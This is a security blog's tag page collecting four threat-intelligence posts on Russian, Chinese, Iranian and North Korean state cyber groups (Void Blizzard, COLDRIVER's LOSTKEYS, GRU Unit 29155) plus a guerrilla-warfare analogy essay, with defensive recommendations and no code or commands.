The Security Brief

Tag: APT

  • Russia’s Void Blizzard Targets the West’s Digital Backbone

    Russia’s Void Blizzard Targets the West’s Digital Backbone

    Microsoft Threat Intelligence has surfaced a new Russia-affiliated cyber actor: Void Blizzard, also tracked as LAUNDRY BEAR. Active since at least April 2024, this group is focused on long-term espionage targeting sectors critical to Western governments, infrastructure, and policy-making.

    Void Blizzard is not just another APT clone or cluster moniker. It represents an evolution in operational flexibility and tradecraft, shifting from relying on stolen credentials bought off the dark web to more aggressive adversary-in-the-middle (AitM) phishing campaigns. These newer efforts leverage typosquatted domains mimicking Microsoft Entra portals to harvest authentication tokens and compromise enterprise identities.

    Target Profile

    Void Blizzard’s campaign focus aligns closely with Russian state priorities. It has gone after targets in:

    • Defense and government agencies
    • Transportation and healthcare infrastructure
    • NGOs, education institutions, and intergovernmental organizations
    • Media and IT service providers

    While some activity overlaps with known Russian actors like APT29, Void Blizzard appears to operate as a distinct cell, coordinating within a larger ecosystem of state-sponsored espionage.

    Notable Tactics

    • Credential-based access remains a preferred entry point, but the shift to AitM phishing is a signal of increasing confidence and offensive posture.
    • Microsoft Entra impersonation suggests a deliberate focus on trusted identity systems, highlighting how fragile authentication flows can be under targeted pressure.
    • Operational consistency across NATO states and Ukraine further indicates strategic alignment with geopolitical goals, not just opportunistic targeting.

    Analyst Comments

    If you’re in defense, energy, public health, or civil society work, Void Blizzard’s tradecraft should raise alarm bells. Organizations should be:

    • Auditing Entra ID and authentication logs for anomalies tied to session replay or suspicious SSO activity
    • Deploying phishing-resistant MFA such as FIDO2 keys
    • Training users to identify lookalike URLs and domain spoofing, particularly in password reset or login prompts
    • Tracking overlaps with other Russian campaigns, especially Star Blizzard and Midnight Blizzard, to catch infrastructure reuse or strategic convergence

    Final Thoughts

    Void Blizzard is not flashy, but it is serious. It demonstrates how Russia continues to evolve its cyber espionage toolkit beneath the noise of more destructive attacks. In an era of hybrid conflict, groups like Void Blizzard are the quiet operatives laying groundwork for geopolitical advantage. They definitely won’t be the last.

    See Microsoft’s full report: https://www.microsoft.com/en-us/security/blog/2025/05/27/new-russia-affiliated-actor-void-blizzard-targets-critical-sectors-for-espionage/

  • Asymmetric Cyber Threats: Lessons from Guerrilla Warfare

    Asymmetric Cyber Threats: Lessons from Guerrilla Warfare

    The Digital Guerrilla

    When you think of cyber warfare, you often imagine digital equivalents of tanks, missiles, and grand battles between major powers. In reality, however, the cyber conflict we see today looks less like Normandy and more like a slow-burning insurgency.

    State-sponsored actors, whether they be from Russia, China, Iran, or North Korea, rarely go toe-to-toe with superior Western cyber defenses in a direct, conventional fight. Instead, they operate in the shadows, using asymmetric tactics meant for low-cost, high-yield disruption. Their methods resemble the playbook of guerrilla fighters throughout history: blend in, strike vulnerable targets, and exploit the defender’s size and rigidity.

    In today’s post, I’ll unpack how these cyber operations mirror classic guerrilla warfare and why this analogy is so interesting and matters for defenders.

    Guerrilla Warfare 101

    It’s all about fighting smarter, not harder. It’s the art of the weak harassing the strong. Following the great stalemates of trench warfare in WWI, insurgent groups have leveraged mobility, surprise, and intimate knowledge of the terrain to outmaneuver larger, better-equipped militaries.

    Characteristics of guerrilla warfare include:

    • Asymmetry: Small groups using unconventional methods to challenge superior foes.
    • Deniability: Fighters blend into civilian populations, making attribution and retaliation tougher.
    • Hit-and-run tactics: Ambushes, sabotage, quick raids, always moving.
    • Psychological ops: Targeting public morale, misinformation.
    • Terrain advantage: Mastery of local geography to evade and frustrate conventional forces.

    Sounds familiar, right? Swap out “fighters” for “APT groups“, “civilian populations” for “cybercriminal groups“, and “terrain” for “network infrastructure“, and you’ve got a pretty solid picture of today’s cyber landscape.

    Guerrilla Tactics in Action: State-Sponsored Cyber Threats

    Asymmetry in the Digital Domain

    State-sponsored groups like Russia’s APT28 and APT29 or North Korea’s Lazarus Group rarely match US or allied cyber capabilities head-on. They exploit the cost asymmetry. For a few thousand dollars in phishing kits, compromised VPNs, leased botnets, or commercial malware, they can inflict millions in damages, steal sensitive data, or shape public narratives. The defender’s dilemma? Defending every endpoint and supply chain vector costs exponentially more than launching simple, repeatable attacks.

    Deniability and Proxy Warfare

    Just as guerrillas hide among civilians, cyber operators mask their identities using compromised infrastructure, false flags, or contracting work out to cyber criminal elements and impressionable anarchists in the case of Russian GRU’s Unit 29155 who incite anarchy and sabotage through various Telegram channels to Ukrainian youth. North Korea’s use of 3rd party IT freelancers to infiltrate Western companies is another prime example. The plausible deniability muddies attribution, delays response, and allows our adversaries to operate with relative impunity.

    Hit-and-Run in Cyberspace

    Watering hole attacks, defacements, and smash-and-grab data theft mirror the guerrilla’s ambush. Breach a vulnerable vendor, pivot to the target, exfiltrate quickly, and vanish while defenders are left scrambling. These aren’t prolonged sieges, they’re opportunistic raids meant to probe weaknesses and sow chaos.

    Information Warfare as PsyOps

    Iranian and Russian cyber units have elevated disinformation to an art form. Influence operations targeting elections, societal divisions, or corporate reputations function as digital equivalents of guerrilla psychological operations. The goal isn’t always tangible damage; sometimes it’s just to erode trust and create confusion or panic.

    Mastering the Digital Terrain

    In guerrilla conflicts, knowing the terrain is everything. In cyberspace, that “terrain” includes compromised networks, 3rd party vendors, poorly monitored endpoints, and the dark web. State-sponsored groups map this terrain meticulously, identifying soft targets and exploiting global infrastructure for cover.

    Some Case Studies: Cyber Guerrilla Warfare in Practice

    In 2025, there are now plenty of examples to pull from but some of the more recent, notable cases include:

    Russia’s (FSB) COLDRIVER/Callisto/Star Blizzard

    Operating between cyberespionage and influence, this group exemplifies cyber guerrilla tactics. With recent reporting detailing their persistent targeting of Western NGOs, think tanks, and academia reflects a strategy of sustained harassment. They focus on undermining soft targets, shaping narratives, and stealing sensitive (not always classified) information that feeds broader geopolitical campaigns.

    North Korea’s IT Worker Fraud

    The DPRK has combined traditional APT activities with an insurgent-style infiltration campaign: fraudulent IT workers securing remote jobs at Western firms. Once inside, these operatives act as insider threats with direct access to networks, sidestepping conventional perimeter defenses. This tactic parallels how insurgents embed within civilian populations to evade detection and execute attacks from within. In this case, funding the regime’s weapons programs, among other motivations.

    Iran’s APT33/35/42

    Iranian threat groups excel at opportunistic targeting, often focusing on vulnerable sectors like oil & gas, transportation, and academia. Their attacks prioritize disruption, espionage, and influence, mirroring guerrilla strategies of infrastructure sabotage and psychological impact over decisive victories.

    Volt Typhoon: An Occupational Model

    China’s Volt Typhoon operations showcase a more sophisticated “occupation” model. Rather than smash-and-grab, their campaigns are long-term entrenchments in U.S. critical infrastructure, designed for persistent access and latent sabotage potential. This is less hit-and-run, more like guerrilla fighters establishing fortified zones in contested territory.

    Why the Guerrilla Warfare Analogy Matters

    Understanding cyber threats through the lens of guerrilla warfare reframes how we think about defense and deterrence.

    • Misaligned Defenses: Conventional cyber defenses are analogous to defending cities with large armies while insurgents roam freely in the countryside. Static defenses are insufficient against agile, persistent adversaries.
    • Deterrence is Harder: You can deter a nation’s military with superior firepower. Deterring a deniable, decentralized cyber guerrilla force is a different challenge.
    • Hybrid Warfare Context: These cyber guerrilla tactics don’t exist in a vacuum. They’re part of broader hybrid strategies, supporting kinetic operations, diplomatic pressure, or internal destabilization efforts.

    Mitigation?

    This is tough one as mitigation against guerrilla tactics requires more than simply building bigger walls or buying more security tools. Some things worth considering:

    • Persistent threat hunting
    • Implement honeypots
    • Coordination/collaboration across government, private sector, and civil society
    • Publicly naming and sanctioning enablers

    Tactics Snapshot

    • Phishing (social engineering)
    • Credential Harvesting (Supply chain raids)
    • Watering Hole Attacks (sabotaged Infrastructure)
    • Supply Chain Subversion (indirect targeting)
    • Wiper Malware (destructive sabotage)

    Conclusion

    Guerrilla warfare didn’t disappear with the end of colonial insurgencies or Cold War proxy wars. It evolved and found a new battleground on the web. Today’s state-sponsored cyber operations mirror the asymmetric tactics of historical insurgencies in that they’re cheap, deniable, persistent, and designed to frustrate superior foes. For defenders like us, recognizing this parallel is less academic and more essential for adapting strategy, resource allocation, and useful threat modeling.

    The digital guerrilla is no longer just a rebel in the jungle. They’re a sanctioned asset, behind a keyboard, operating in the blurred space between espionage, sabotage, and information warfare.

  • COLDRIVER’s New LOSTKEYS Malware Targets Western Officials

    COLDRIVER’s New LOSTKEYS Malware Targets Western Officials

    Summary

    Between Jan and Apr 2025, suspected Russian FSB-linked threat group COLDRIVER delivered LOSTKEYS malware using a fake CAPTCHA to target Western officials, journalists, think tanks, and NGOs.

    Russian Threat Group COLDRIVER Deploys LOSTKEYS Malware Targeting Western Entities

    The Russian state-sponsored threat group, COLDRIVER (aka UNC4057, Callisto, and Star Blizzard), has expanded its cyberespionage toolkit with the additional of a new malware strain dubbed LOSTKEYS. According to Google’s Threat Intelligence Group (GTIG), this development marks a significant evolution from COLDRIVER’s usual credential phishing tactics to more sophisticated malware development.

    Evolution of Tactics

    Historically, COLDRIVER focused on credential phishing campaigns targeting high-profile individuals in NATO governments, NGOs, and former intelligence and diplomatic officials. The threat group’s primary objective has been intelligence collection in support of Russian strategic interests. More recent activities observed in early-2025 indicate a shift towards deploying more custom malware to further enhance their data exfiltration capabilities.

    Introduction of LOSTKEYS

    LOSTKEYS was designed to steal files from predefined directories and file types, as well as send system information and running processes back to the threat actors. The malware is delivered through a multi-stage infection chain that begins with a lure website featuring a fake CAPTCHA. Once a target interacts with the CAPTCHA, they’re then prompted to execute a PowerShell script, starting the malware installation process. This method, known as “ClickFix”, involves socially engineering targets to copy, paste, and execute malicious PowerShell commands. The technique has been gaining increased notoriety as various other threat actors have begun leveraging it.

    Targets and Objectives

    COLDRIVER’s recent campaigns have targeted current and former advisors to Western governments, militaries, journalists, think tanks, NGOs, and individuals connected to Ukraine. The group’s operations aim to gather intelligence that aligns with Russian strategic interests. In some cases, COLDRIVER has been linked to hack-and-leak campaigns targeting officials in the UK and NGOs.

    Analyst Comments:

    The evolution of COLDRIVER from basic credential phishing to deploying custom malware like LOSTKEYS emphasizes a broader trend in Russian cyberespionage: the increasing willingness to burn bespoke tools in pursuit of higher value intelligence collection. The shift seems to suggest mounting pressure on Russian intelligence services to deliver actionable insights amid ongoing geopolitical tensions, particularly related to NATO support for Ukraine and Western policy responses.

    Through their targeting of advisors, think tanks, and NGOs, COLDRIVER is focusing on influencers and policy shapers, not just government officials. This indicates a strategic effort of preempting or shaping foreign policy decisions. Their adoption of techniques like ClickFix also signals an emphasis on user-driven execution, a smart bypass of traditional email defenses and endpoint controls. As we’ve seen in the past, employees are the weakest link in an organization’s security posture.

    For us network defenders, this campaign highlights the importance of defense-in depth strategies, user education (a must), and proactive threat hunting. The fact that COLDRIVER now deploys malware directly onto victim systems raises the stakes for organizations previously focused only on account compromise prevention.

    In short, COLDRIVER’s operational pivot is just another reminder that cyberespionage groups adapt faster than most defensive postures. Organizations in policy-adjacent sectors should assume they are in the targeting scope, even if they don’t handle classified information, and adjust security postures accordingly.

    Reference(s) and Further Reading:

    https://cloud.google.com/blog/topics/threat-intelligence/coldriver-steal-documents-western-targets-ngos

    https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-341a

    https://home.treasury.gov/news/press-releases/jy1962

  • The Escalation of GRU Unit 29155: Espionage and Sabotage Tactics

    The Escalation of GRU Unit 29155: Espionage and Sabotage Tactics

    Disclaimer: This post is based on unclassified, open-source reporting and reflects my personal analysis and interpretations. The views expressed here are my own and do not represent the views or positions of my employer.

    Background

    Russian GRU military intelligence Unit 29155 (aka Cadet Blizzard, Ember Bear, FrozenVista, UNC2589) is a covert subunit of the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU), primarily tasked with conducting high-stakes and clandestine operations abroad. Established under the GRU, Unit 29155 gained public attention due to its involvement in activities that align with Russia’s asymmetric warfare objectives, particularly in Europe, Ukraine, and NATO-affiliated regions. Unit 29155 operates in several domains, from traditional espionage and sabotage to cyber operations.

    Unit 29155 has significantly intensified operations since 2020, pivoting from covert actions in Europe toward a greater emphasis on cyber operations with a focus on undermining Ukraine and NATO allies through espionage, data manipulation, and sabotage.

    Primary TTPs

    • Espionage and Data Theft
      • Unit 29155 conducts extensive espionage campaigns aimed at gathering intelligence from NATO countries, European union members, and multiple nations in Latin America and Central Asian. They’ve exploited critical infrastructure and government systems leveraging reconnaissance tools like Nmap and Shodan to scan for vulnerabilities and gather intelligence [2].
      • Sensitive information obtained through these operations are occasionally leaked or shared publicly in order to damage the reputations of their victims as part of influence efforts [3].
    • Destructive Operations
      • Unit 29155 was tracked as the group deploying the destructive WhisperGate malware, disguised as ransomware but meant to erase victim data. This wiper was used in targeting of Ukrainian governmental and critical infrastructure entities. This activity provided evidence of a clear shift to sabotage tactics aligned with Russian military objectives early in the Russia/Ukraine conflict.
      • Destructive attacks have also been directed towards logistics operations supporting Ukraine, as seen in repeated attacks against infrastructure crucial to NATO and EU support for Ukraine [2].
    • Infrastructure Scanning/Domain Enumeration
      • Unit 29155 engaged in over 14,000 documented cases of domain scanning, targeting NATO infrastructure and EU entities. The scanning has been described as preparatory, often identifying weak points for later exploitation efforts. Open-source and custom tools like Acunetix, WPScan, and VirusTotal were commonly used for this reconnaissance [3].
    • Cybercriminal Overlap
      • Not wholly unique to Unit 29155, but rather the broad spectrum of Russian state-sponsored APT groups, researchers report collaboration with known cybercriminal elements, employing non-GRU actors to facilitate operations. This working relationship extends the group’s reach and allows it to exploit technical expertise outside formal military ranks while obscuring attribution. It is also believed that this particular unit consists of primarily junior personnel and so may operate at a less sophisticated level than other groups like APT28 or APT29 [4].

    Mitigations and Recommendations

    Cyber defenders across critical sectors are encouraged to implement mitigations against known tactics:

    • Prioritize patching of known vulnerabilities and enforce multi-factor authentication (MFA).
    • Monitor networks for unusual scanning or reconnaissance activity and segment networks to mitigate lateral movement, post infiltration.
    • Use intrusion detection tools to monitor for technical indicators of compromise (IOCs) relating to Unit 29155.

    Unit 29155’s evolution highlights a blend of traditional espionage with enhanced cyber and sabotage capabilities, particularly in relation to high-stakes geopolitical targets. The expanded use of cyber tactics show the importance for affected nations and organizations to maintain vigilance and robust cyber defenses.

    References

    [1] https://www.fbi.gov/wanted/cyber/gru-29155-cyber-actors

    [2] https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/3895808/%5B3%5D https://www.cyber.gov.au/about-us/view-all-content/alerts-and-advisories/russian-military-cyber-actors-target-us-and-global-critical-infrastructure

    [4] https://www.rferl.org/a/germany-gru-russia-cyber-warning/33112764.html